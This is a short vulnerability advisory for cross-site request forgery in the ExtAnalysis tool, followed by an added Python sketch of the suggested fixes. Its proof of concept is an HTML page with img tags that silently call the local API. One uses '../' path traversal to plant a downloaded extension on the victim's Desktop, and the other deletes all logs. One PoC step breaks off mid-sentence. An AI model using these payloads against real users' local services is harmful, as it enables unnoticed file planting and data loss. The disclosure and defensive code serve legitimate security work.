Cross-Site Request Forgery (CSRF) in tuhinshubhra/extanalysis
Apr 3rd 2020
The ExtAnalysis project is vulnerable to several CSRF attacks that could lead to loss of functionality and to the placement of malicious files in arbitrary directories without the victim's knowledge.
Proof of Concept (Credit: Mik317)
- Download the git project and run the server through the
- Insert the following code on a malicious host
    <html>
      <!-- Downloads the Gmass extension into the `Desktop` folder. Fix: reject `../` and add a CSRF token -->
      <img src="http://127.0.0.1:13337/api/?query=dlanalysis&extid=ehomdgjhgmbidokdgicgmdiedadncbgf&savedir=../../../Desktop/hacked" />
      <!-- Deletes all the logs without the victim's knowledge. Fix: add a CSRF token -->
      <img src="http://127.0.0.1:13337/api/?query=deleteAll" />
    </html>
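A server-side check in the spirit of the report's own `Fix:` comments (a per-session CSRF token plus confinement of `savedir` to a download root), written here as an added Python example that is not ExtAnalysis code; `ALLOWED_ORIGINS`, `DOWNLOAD_ROOT` and the function names are assumptions.

```python
import hmac
import os
import secrets
from urllib.parse import urlsplit

# Assumed values for this example: the origin the ExtAnalysis UI is served from
# (taken from the PoC URLs) and a root directory under which analyses may be saved.
ALLOWED_ORIGINS = {"http://127.0.0.1:13337"}
DOWNLOAD_ROOT = os.path.abspath("downloads")


def issue_csrf_token():
    """Per-session secret the UI embeds in its own requests; a foreign page cannot read it."""
    return secrets.token_urlsafe(32)


def csrf_check(headers, params, session_token):
    """Return None if the request is acceptable, otherwise the reason for rejecting it."""
    origin = headers.get("Origin") or headers.get("Referer")
    if origin:
        parts = urlsplit(origin)
        if f"{parts.scheme}://{parts.netloc}" not in ALLOWED_ORIGINS:
            return "cross-origin request"
    token = params.get("csrf_token")
    if not token or not hmac.compare_digest(token, session_token):
        return "missing or invalid CSRF token"
    return None


def resolve_savedir(savedir):
    """Confine a user-supplied savedir to DOWNLOAD_ROOT; None if it escapes (e.g. via ../)."""
    target = os.path.abspath(os.path.join(DOWNLOAD_ROOT, savedir))
    try:
        inside = os.path.commonpath([DOWNLOAD_ROOT, target]) == DOWNLOAD_ROOT
    except ValueError:  # different drives on Windows
        inside = False
    return target if inside else None


def handle_api(method, headers, params, session_token):
    """Dispatch the two endpoints from the report with both checks applied."""
    if method != "POST":  # an <img> tag can only issue GET
        return 405, "state-changing queries must be POSTed"
    reason = csrf_check(headers, params, session_token)
    if reason:
        return 403, reason
    query = params.get("query")
    if query == "deleteAll":
        return 200, "logs deleted"
    if query == "dlanalysis":
        target = resolve_savedir(params.get("savedir", ""))
        if target is None:
            return 400, "savedir escapes download root"
        return 200, f"saved under {target}"
    return 404, "unknown query"
```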